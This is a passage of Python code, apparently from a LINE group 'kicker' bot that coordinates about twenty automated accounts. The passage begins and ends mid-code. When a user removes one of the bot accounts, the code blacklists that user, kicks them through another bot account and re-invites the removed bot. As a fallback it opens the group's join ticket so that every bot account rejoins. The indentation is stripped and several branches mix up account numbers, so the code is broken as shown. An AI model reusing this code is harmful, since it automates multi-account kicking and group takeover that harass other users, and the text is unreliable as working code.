kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
G = kicker6.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.updateGroup(G)
Ticket = kicker6.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker6.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker6.updateGroup(G)
Ticket = kicker6.reissueGroupTicket(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
G = kicker7.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.updateGroup(G)
Ticket = kicker7.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker7.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker7.updateGroup(G)
Ticket = kicker7.reissueGroupTicket(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
pass
return
if Dmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
G = kicker8.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.updateGroup(G)
Ticket = kicker8.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker8.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker8.updateGroup(G)
Ticket = kicker8.reissueGroupTicket(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
pass
return
if Emid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
G = kicker9.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.updateGroup(G)
Ticket = kicker9.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker9.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker9.updateGroup(G)
Ticket = kicker9.reissueGroupTicket(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
pass
return
if Fmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
G = kicker10.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.updateGroup(G)
Ticket = kicker10.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker10.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker10.updateGroup(G)
Ticket = kicker10.reissueGroupTicket(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
pass
return
if Gmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
G = kicker11.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.updateGroup(G)
Ticket = kicker11.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker11.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker11.updateGroup(G)
Ticket = kicker11.reissueGroupTicket(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
